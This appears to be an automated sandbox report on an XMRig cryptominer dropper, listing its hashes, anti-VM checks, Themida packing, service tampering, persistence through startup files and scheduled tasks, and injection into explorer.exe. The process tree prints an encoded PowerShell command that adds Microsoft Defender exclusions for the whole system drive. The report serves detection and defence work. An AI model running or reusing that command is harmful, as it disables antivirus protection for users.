xmrig | 1c69ffb2454d4dbaf5c520960335b9d6addcc935afa7f5447075626280c121ca

Analysis

max time kernel
300s
max time network
274s
platform
windows7_x64
resource
win7-20220414-en
submitted
29-06-2022 22:15

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

1c69ffb2454d4dbaf5c520960335b9d6addcc935afa7f5447075626280c121ca.exe
Size

7.4MB
MD5

d039361e9ca80d93126dce4151806527
SHA1

b2ee80df3eaa3111e6ee00608307c6ed6f9a6632
SHA256

1c69ffb2454d4dbaf5c520960335b9d6addcc935afa7f5447075626280c121ca
SHA512

da114fcb97f881a056e18294954390b8d532444a4b68876611799ecd64eac13b8aaec03a2d8d4cc3742a9f662fd948526d8cbc07534f3468e31fcdc83bceab5a

Score

10^/10

xmrig discovery evasion exploit miner themida trojan

Malware Config

Signatures

Modifies security service 2 TTPs 2 IoCs

evasion

Modify Registry

T1112

Modify Existing Service

T1031

Processes:

sc.exe

description	ioc	process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Parameters	sc.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Security	sc.exe

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 2 IoCs
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497

Processes:

setup.exeupdater.exe

description ioc process

Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ setup.exe
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ updater.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	setup.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	updater.exe

XMRig Miner Payload 13 IoCs

miner

Processes:

resource	yara_rule
behavioral1/memory/844-170-0x0000000140000000-0x0000000140803000-memory.dmp	xmrig
behavioral1/memory/844-172-0x0000000140000000-0x0000000140803000-memory.dmp	xmrig
behavioral1/memory/844-174-0x0000000140000000-0x0000000140803000-memory.dmp	xmrig
behavioral1/memory/844-175-0x0000000140000000-0x0000000140803000-memory.dmp	xmrig
behavioral1/memory/844-176-0x0000000140000000-0x0000000140803000-memory.dmp	xmrig
behavioral1/memory/844-178-0x0000000140000000-0x0000000140803000-memory.dmp	xmrig
behavioral1/memory/844-180-0x0000000140000000-0x0000000140803000-memory.dmp	xmrig
behavioral1/memory/844-181-0x0000000140000000-0x0000000140803000-memory.dmp	xmrig
behavioral1/memory/844-182-0x0000000140000000-0x0000000140803000-memory.dmp	xmrig
behavioral1/memory/844-184-0x0000000140000000-0x0000000140803000-memory.dmp	xmrig
behavioral1/memory/844-186-0x0000000140000000-0x0000000140803000-memory.dmp	xmrig
behavioral1/memory/844-187-0x0000000140000000-0x0000000140803000-memory.dmp	xmrig
behavioral1/memory/844-196-0x0000000140000000-0x0000000140803000-memory.dmp	xmrig

Drops file in Drivers directory 2 IoCs

Processes:

conhost.execonhost.exe

description	ioc	process
File opened for modification	C:\Windows\system32\drivers\etc\hosts	conhost.exe
File opened for modification	C:\Windows\system32\drivers\etc\hosts	conhost.exe

Executes dropped EXE 2 IoCs

Processes:

setup.exeupdater.exe

pid process

1616 setup.exe
1612 updater.exe
Possible privilege escalation attempt 4 IoCs
exploit

Processes:

icacls.exeicacls.exetakeown.exetakeown.exe

pid process

844 icacls.exe
1756 icacls.exe
1688 takeown.exe
584 takeown.exe
Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

pid	process
1616	setup.exe
1612	updater.exe

pid	process
844	icacls.exe
1756	icacls.exe
1688	takeown.exe
584	takeown.exe

Checks BIOS information in registry 2 TTPs 4 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

updater.exesetup.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	updater.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	updater.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	setup.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	setup.exe

Drops startup file 2 IoCs

Processes:

cmd.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\lol.bat	cmd.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\lol.bat	cmd.exe

Loads dropped DLL 2 IoCs

Processes:

1c69ffb2454d4dbaf5c520960335b9d6addcc935afa7f5447075626280c121ca.exetaskeng.exe

pid process

1092 1c69ffb2454d4dbaf5c520960335b9d6addcc935afa7f5447075626280c121ca.exe
924 taskeng.exe
Modifies file permissions 1 TTPs 4 IoCs
discovery

File Permissions Modification
T1222

Processes:

icacls.exetakeown.exetakeown.exeicacls.exe

pid process

1756 icacls.exe
1688 takeown.exe
584 takeown.exe
844 icacls.exe

pid	process
1092	1c69ffb2454d4dbaf5c520960335b9d6addcc935afa7f5447075626280c121ca.exe
924	taskeng.exe

pid	process
1756	icacls.exe
1688	takeown.exe
584	takeown.exe
844	icacls.exe

Themida packer 12 IoCs

Detects Themida, an advanced Windows software protection system.

themida

Processes:

resource	yara_rule
\Windows\Temp\setup.exe	themida
C:\Windows\Temp\setup.exe	themida
behavioral1/memory/1616-59-0x0000000000400000-0x000000000106E000-memory.dmp	themida
behavioral1/memory/1616-62-0x0000000000400000-0x000000000106E000-memory.dmp	themida
behavioral1/memory/1616-66-0x0000000000400000-0x000000000106E000-memory.dmp	themida
C:\Windows\Temp\setup.exe	themida
\Program Files\Chrome\updater.exe	themida
C:\Program Files\Chrome\updater.exe	themida
behavioral1/memory/1612-117-0x0000000000400000-0x000000000106E000-memory.dmp	themida
behavioral1/memory/1612-116-0x0000000000400000-0x000000000106E000-memory.dmp	themida
behavioral1/memory/1612-120-0x0000000000400000-0x000000000106E000-memory.dmp	themida
C:\Program Files\Chrome\updater.exe	themida

Checks whether UAC is enabled 1 TTPs 2 IoCs

evasion trojan

System Information Discovery

T1082

Processes:

setup.exeupdater.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	setup.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	updater.exe

Drops file in System32 directory 2 IoCs

Processes:

powershell.exepowershell.exe

description	ioc	process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

Processes:

setup.exeupdater.exe

pid process

1616 setup.exe
1612 updater.exe

pid	process
1616	setup.exe
1612	updater.exe

Suspicious use of SetThreadContext 2 IoCs

Processes:

conhost.exe

description	pid	process	target process
PID 900 set thread context of 2032	900	conhost.exe	conhost.exe
PID 900 set thread context of 844	900	conhost.exe	explorer.exe

Drops file in Program Files directory 3 IoCs

Processes:

conhost.execonhost.exe

description	ioc	process
File created	C:\Program Files\Chrome\updater.exe	conhost.exe
File opened for modification	C:\Program Files\Chrome\updater.exe	conhost.exe
File created	C:\Program Files\Google\Libs\WR64.sys	conhost.exe

Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exe

pid process

960 sc.exe
752 sc.exe
1692 sc.exe
1644 sc.exe
380 sc.exe
896 sc.exe
836 sc.exe
1956 sc.exe
1640 sc.exe
2036 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

1504 schtasks.exe

pid	process
960	sc.exe
752	sc.exe
1692	sc.exe
1644	sc.exe
380	sc.exe
896	sc.exe
836	sc.exe
1956	sc.exe
1640	sc.exe
2036	sc.exe

pid	process
1504	schtasks.exe

Modifies Internet Explorer settings 1 TTPs 46 IoCs

adware spyware

Modify Registry

T1112

Processes:

IEXPLORE.EXEiexplore.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "363313088"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000\Software\Microsoft\Internet Explorer\GPU	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000\Software\Microsoft\Internet Explorer\InternetRegistry	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000\Software\Microsoft\Internet Explorer\DOMStorage\take-realprize.life\NumberOfSubdomains = "1"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000\Software\Microsoft\Internet Explorer\DOMStorage\take-realprize.life\Total = "16"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000\Software\Microsoft\Internet Explorer\DOMStorage\take-realprize.life\Total = "0"	IEXPLORE.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000\Software\Microsoft\Internet Explorer\IETld\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000\Software\Microsoft\Internet Explorer\Toolbar	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000\Software\Microsoft\Internet Explorer\DOMStorage\Total	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000850f07ecb424934d8f5a48a59e73cec00000000002000000000010660000000100002000000019384849c120d65968d25256eaa03634d5023318fccadba35ed6b09568bd3473000000000e8000000002000020000000f0a7117fbbdec42c86ea66bf213da327489ccd3602fddd45c59b7c73fd19e05b90000000fc4311cd5692fac2a8580f4d6d4bb8d478732071f816e35ad860c42c782763a280c28dd9946aba92ae8aeb0d7db68cc25ec580b131b38a691a8736e2c37cb23ef1285b390901462f4bb7a88d9a51eb33b68f1050c240f02719340e729035655f16b5cd92a8d651e27edcac9fce3c3f1978e46dbf4df3e6e31586a1cf5cd44b44f68baa3b7159347d66911d7a528edcf840000000305c450393cb5a690c6e2833cc58284aee80aa1818f043078fbb7609ebc1dac85b97fd02ad54dcb5a76342e4a8e6e8eff898459928c598ff26ab5b240ed22425	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000\Software\Microsoft\Internet Explorer\LowRegistry	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{B5A9B191-F809-11EC-95E2-F2A7A8855ABA} = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000\Software\Microsoft\Internet Explorer\DOMStorage\take-realprize.life\ = "16"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000\Software\Microsoft\Internet Explorer\DOMStorage\Total\ = "0"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000\Software\Microsoft\Internet Explorer\PageSetup	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000\Software\Microsoft\Internet Explorer\DOMStorage\Total\ = "16"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000\Software\Microsoft\Internet Explorer\DOMStorage\take-realprize.life\ = "0"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000\Software\Microsoft\Internet Explorer\DomainSuggestion	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000\Software\Microsoft\Internet Explorer\Zoom	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000\Software\Microsoft\Internet Explorer\DOMStorage\take-realprize.life	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000850f07ecb424934d8f5a48a59e73cec00000000002000000000010660000000100002000000063c622c49e0ae985abf659cf8b0a8162d23358326efaa9ec95b2d1a22bc8c4c0000000000e8000000002000020000000e723a098b6ab606648a1c543b12ce28c328d11cdf1f972d40be483aacb93979a2000000039d88ca582b4355b91d01c98aca6659f0febc57e84957e7e0abb7d3d786e03f1400000003372b32cc09eafa9cc62a360ad68c99c43f954059c82b0533e294fe32dd1bb469b6c73bef57488262e967198458c958406c646ffd398607a793888b6b03220cc	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 70452193168cd801	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000\Software\Microsoft\Internet Explorer\IntelliForms	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000\Software\Microsoft\Internet Explorer\DOMStorage	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage	iexplore.exe

Modifies data under HKEY_USERS 5 IoCs

Processes:

conhost.exepowershell.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	conhost.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	conhost.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	conhost.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage	powershell.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = f8d1f892168cd801	powershell.exe

Modifies registry key 1 TTPs 18 IoCs

Modify Registry

T1112

Processes:

reg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exe

pid	process
380	reg.exe
1692	reg.exe
752	reg.exe
1612	reg.exe
896	reg.exe
1636	reg.exe
584	reg.exe
588	reg.exe
1032	reg.exe
1900	reg.exe
1544	reg.exe
1632	reg.exe
976	reg.exe
1640	reg.exe
680	reg.exe
692	reg.exe
1696	reg.exe
1176	reg.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.execonhost.exepowershell.execonhost.exeexplorer.exe

pid	process
1912	powershell.exe
844	conhost.exe
2036	powershell.exe
900	conhost.exe
844	explorer.exe
844	explorer.exe
844	explorer.exe
844	explorer.exe
844	explorer.exe
844	explorer.exe
844	explorer.exe
844	explorer.exe
844	explorer.exe
844	explorer.exe
844	explorer.exe
844	explorer.exe
844	explorer.exe
844	explorer.exe
844	explorer.exe
844	explorer.exe
844	explorer.exe
844	explorer.exe
844	explorer.exe
844	explorer.exe
844	explorer.exe
844	explorer.exe
844	explorer.exe
844	explorer.exe
844	explorer.exe
844	explorer.exe
844	explorer.exe
844	explorer.exe
844	explorer.exe
844	explorer.exe
844	explorer.exe
844	explorer.exe
844	explorer.exe
844	explorer.exe
844	explorer.exe
844	explorer.exe
844	explorer.exe
844	explorer.exe
844	explorer.exe
844	explorer.exe
844	explorer.exe
844	explorer.exe
844	explorer.exe
844	explorer.exe
844	explorer.exe
844	explorer.exe
844	explorer.exe
844	explorer.exe
844	explorer.exe
844	explorer.exe
844	explorer.exe
844	explorer.exe
844	explorer.exe
844	explorer.exe
844	explorer.exe
844	explorer.exe
844	explorer.exe
844	explorer.exe
844	explorer.exe
844	explorer.exe

Suspicious behavior: LoadsDriver 1 IoCs

Processes:

pid process

468

pid	process
468

Suspicious use of AdjustPrivilegeToken 15 IoCs

Processes:

powershell.exereg.exepowercfg.exepowercfg.exereg.exeschtasks.execonhost.exepowershell.execonhost.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exetakeown.exeexplorer.exe

description	pid	process
Token: SeDebugPrivilege	1912	powershell.exe
Token: SeShutdownPrivilege	584	reg.exe
Token: SeShutdownPrivilege	1136	powercfg.exe
Token: SeShutdownPrivilege	976	powercfg.exe
Token: SeShutdownPrivilege	380	reg.exe
Token: SeTakeOwnershipPrivilege	1688	schtasks.exe
Token: SeDebugPrivilege	844	conhost.exe
Token: SeDebugPrivilege	2036	powershell.exe
Token: SeDebugPrivilege	900	conhost.exe
Token: SeShutdownPrivilege	528	powercfg.exe
Token: SeShutdownPrivilege	2004	powercfg.exe
Token: SeShutdownPrivilege	976	powercfg.exe
Token: SeShutdownPrivilege	1612	powercfg.exe
Token: SeTakeOwnershipPrivilege	584	takeown.exe
Token: SeLockMemoryPrivilege	844	explorer.exe

Suspicious use of FindShellTrayWindow 1 IoCs

Processes:

iexplore.exe

pid process

1944 iexplore.exe
Suspicious use of SetWindowsHookEx 6 IoCs

Processes:

iexplore.exeIEXPLORE.EXE

pid process

1944 iexplore.exe
1944 iexplore.exe
1732 IEXPLORE.EXE
1732 IEXPLORE.EXE
1732 IEXPLORE.EXE
1732 IEXPLORE.EXE

pid	process
1944	iexplore.exe

pid	process
1944	iexplore.exe
1944	iexplore.exe
1732	IEXPLORE.EXE
1732	IEXPLORE.EXE
1732	IEXPLORE.EXE
1732	IEXPLORE.EXE

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

1c69ffb2454d4dbaf5c520960335b9d6addcc935afa7f5447075626280c121ca.execmd.exeiexplore.exesetup.execonhost.execmd.execmd.exeschtasks.exe

description	pid	process	target process
PID 1092 wrote to memory of 1616	1092	1c69ffb2454d4dbaf5c520960335b9d6addcc935afa7f5447075626280c121ca.exe	setup.exe
PID 1092 wrote to memory of 1616	1092	1c69ffb2454d4dbaf5c520960335b9d6addcc935afa7f5447075626280c121ca.exe	setup.exe
PID 1092 wrote to memory of 1616	1092	1c69ffb2454d4dbaf5c520960335b9d6addcc935afa7f5447075626280c121ca.exe	setup.exe
PID 1092 wrote to memory of 1616	1092	1c69ffb2454d4dbaf5c520960335b9d6addcc935afa7f5447075626280c121ca.exe	setup.exe
PID 1092 wrote to memory of 1824	1092	1c69ffb2454d4dbaf5c520960335b9d6addcc935afa7f5447075626280c121ca.exe	cmd.exe
PID 1092 wrote to memory of 1824	1092	1c69ffb2454d4dbaf5c520960335b9d6addcc935afa7f5447075626280c121ca.exe	cmd.exe
PID 1092 wrote to memory of 1824	1092	1c69ffb2454d4dbaf5c520960335b9d6addcc935afa7f5447075626280c121ca.exe	cmd.exe
PID 1092 wrote to memory of 1824	1092	1c69ffb2454d4dbaf5c520960335b9d6addcc935afa7f5447075626280c121ca.exe	cmd.exe
PID 1092 wrote to memory of 2016	1092	1c69ffb2454d4dbaf5c520960335b9d6addcc935afa7f5447075626280c121ca.exe	cmd.exe
PID 1092 wrote to memory of 2016	1092	1c69ffb2454d4dbaf5c520960335b9d6addcc935afa7f5447075626280c121ca.exe	cmd.exe
PID 1092 wrote to memory of 2016	1092	1c69ffb2454d4dbaf5c520960335b9d6addcc935afa7f5447075626280c121ca.exe	cmd.exe
PID 1092 wrote to memory of 2016	1092	1c69ffb2454d4dbaf5c520960335b9d6addcc935afa7f5447075626280c121ca.exe	cmd.exe
PID 2016 wrote to memory of 1944	2016	cmd.exe	iexplore.exe
PID 2016 wrote to memory of 1944	2016	cmd.exe	iexplore.exe
PID 2016 wrote to memory of 1944	2016	cmd.exe	iexplore.exe
PID 2016 wrote to memory of 1944	2016	cmd.exe	iexplore.exe
PID 1944 wrote to memory of 1732	1944	iexplore.exe	IEXPLORE.EXE
PID 1944 wrote to memory of 1732	1944	iexplore.exe	IEXPLORE.EXE
PID 1944 wrote to memory of 1732	1944	iexplore.exe	IEXPLORE.EXE
PID 1944 wrote to memory of 1732	1944	iexplore.exe	IEXPLORE.EXE
PID 1616 wrote to memory of 844	1616	setup.exe	conhost.exe
PID 1616 wrote to memory of 844	1616	setup.exe	conhost.exe
PID 1616 wrote to memory of 844	1616	setup.exe	conhost.exe
PID 1616 wrote to memory of 844	1616	setup.exe	conhost.exe
PID 844 wrote to memory of 1420	844	conhost.exe	cmd.exe
PID 844 wrote to memory of 1420	844	conhost.exe	cmd.exe
PID 844 wrote to memory of 1420	844	conhost.exe	cmd.exe
PID 1420 wrote to memory of 1912	1420	cmd.exe	powershell.exe
PID 1420 wrote to memory of 1912	1420	cmd.exe	powershell.exe
PID 1420 wrote to memory of 1912	1420	cmd.exe	powershell.exe
PID 844 wrote to memory of 1800	844	conhost.exe	cmd.exe
PID 844 wrote to memory of 1800	844	conhost.exe	cmd.exe
PID 844 wrote to memory of 1800	844	conhost.exe	cmd.exe
PID 844 wrote to memory of 908	844	conhost.exe	schtasks.exe
PID 844 wrote to memory of 908	844	conhost.exe	schtasks.exe
PID 844 wrote to memory of 908	844	conhost.exe	schtasks.exe
PID 1800 wrote to memory of 896	1800	cmd.exe	sc.exe
PID 1800 wrote to memory of 896	1800	cmd.exe	sc.exe
PID 1800 wrote to memory of 896	1800	cmd.exe	sc.exe
PID 1800 wrote to memory of 380	1800	cmd.exe	reg.exe
PID 1800 wrote to memory of 380	1800	cmd.exe	reg.exe
PID 1800 wrote to memory of 380	1800	cmd.exe	reg.exe
PID 908 wrote to memory of 584	908	schtasks.exe	reg.exe
PID 908 wrote to memory of 584	908	schtasks.exe	reg.exe
PID 908 wrote to memory of 584	908	schtasks.exe	reg.exe
PID 1800 wrote to memory of 752	1800	cmd.exe	cmd.exe
PID 1800 wrote to memory of 752	1800	cmd.exe	cmd.exe
PID 1800 wrote to memory of 752	1800	cmd.exe	cmd.exe
PID 1800 wrote to memory of 2036	1800	cmd.exe	sc.exe
PID 1800 wrote to memory of 2036	1800	cmd.exe	sc.exe
PID 1800 wrote to memory of 2036	1800	cmd.exe	sc.exe
PID 1800 wrote to memory of 960	1800	cmd.exe	sc.exe
PID 1800 wrote to memory of 960	1800	cmd.exe	sc.exe
PID 1800 wrote to memory of 960	1800	cmd.exe	sc.exe
PID 908 wrote to memory of 1136	908	schtasks.exe	powercfg.exe
PID 908 wrote to memory of 1136	908	schtasks.exe	powercfg.exe
PID 908 wrote to memory of 1136	908	schtasks.exe	powercfg.exe
PID 1800 wrote to memory of 680	1800	cmd.exe	reg.exe
PID 1800 wrote to memory of 680	1800	cmd.exe	reg.exe
PID 1800 wrote to memory of 680	1800	cmd.exe	reg.exe
PID 1800 wrote to memory of 1636	1800	cmd.exe	reg.exe
PID 1800 wrote to memory of 1636	1800	cmd.exe	reg.exe
PID 1800 wrote to memory of 1636	1800	cmd.exe	reg.exe
PID 908 wrote to memory of 976	908	schtasks.exe	powercfg.exe

C:\Users\Admin\AppData\Local\Temp\1c69ffb2454d4dbaf5c520960335b9d6addcc935afa7f5447075626280c121ca.exe
"C:\Users\Admin\AppData\Local\Temp\1c69ffb2454d4dbaf5c520960335b9d6addcc935afa7f5447075626280c121ca.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1092

C:\Windows\Temp\setup.exe
"C:\Windows\Temp\setup.exe"
2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of WriteProcessMemory
PID:1616

C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "C:\Windows\Temp\setup.exe"
3⤵
- Drops file in Drivers directory
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:844

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAHQAcwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGEAcgBtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHcAagB5AHoAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAYwBuACMAPgA="
4⤵
- Suspicious use of WriteProcessMemory
PID:1420

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
